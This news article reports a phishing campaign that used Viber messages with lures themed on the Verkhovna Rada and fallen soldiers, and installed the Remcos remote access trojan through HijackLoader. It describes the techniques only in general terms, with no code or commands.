When Your "Admin" is a Spy: How Legitimate Remcos Became a Favorite Hacker Tool in Ukraine
Cybercriminals disguise infection as requests from the Verkhovna Rada and hide malicious code behind "legitimate" Windows processes.
Cybercriminals disguise infection as requests from the Verkhovna Rada and hide malicious code behind "legitimate" Windows processes.
Military and state institutions have once again become the target of a focused cyberattack, where threat actors exploited one of the most sensitive topics for citizens. Such messages were used as bait in a new phishing campaign uncovered by cybersecurity specialists.
The attack is attributed to the Hive0156 group. According to data from the Chinese 360 Threat Intelligence Center, the group has been particularly active in data-hunting operations targeting military and government organizations in 2025. This time, the attackers also focused on the Verkhovna Rada.
The primary distribution channel for the attack was the popular Viber messenger. Potential victims were sent an archive with an innocuous-looking name, containing shortcuts disguised as official parliamentary documents. Among them were supposedly official requests from the Verkhovna Rada, scans of appeals from relatives of deceased servicemen, and attachments with loss lists from recent years. The themes were chosen to evoke an emotional response and the desire to immediately open the file.
Upon clicking, the user would see the expected document, but simultaneously, a complex infection chain would begin unfolding in the system. In the background, PowerShell scripts launched and additional components were downloaded from remote servers. To bypass security mechanisms, advanced techniques like DLL Sideloading, non-standard control flow transfers, and in-memory replacement of content within legitimate system modules were employed.
A key role in the attack was played by the HijackLoader. It was responsible for checking the environment, attempting to bypass antivirus software, establishing persistence via the Task Scheduler, and preparing the final infection stage. To disguise malicious activity, the code actively mimicked the behavior of legitimate Windows libraries, substituted call stacks, and even dynamically generated environment variable names, making each installation unique.
The ultimate goal of the operation was to install the Remcos Remote Access Trojan (RAT), which is officially sold as an administrative tool but has long been actively used in espionage campaigns. Once infected, Remcos gives the attacker full control over the system, including data theft, remote command execution, screen monitoring, and persistent presence. Control is managed through a convenient graphical panel, allowing for both automated information gathering and manual work with specific targets.
Chinese analysts note that all elements of the attack fit well with the familiar modus operandi of UAC-0184. This includes the choice of victims, the use of messengers for delivering malicious files, the characteristic lures designed as official military and legal documents, and the combination of HijackLoader with Remcos. The totality of these factors allows for attributing the campaign to this group with high confidence.
Specialists once again emphasize that such attacks are designed not to exploit technical vulnerabilities but to exploit people's trust and emotional state. In specific conditions, themes like the fates of the deceased and compensation for families become particularly powerful tools of social engineering. This makes the cyber threat not only technical but also deeply psychological.
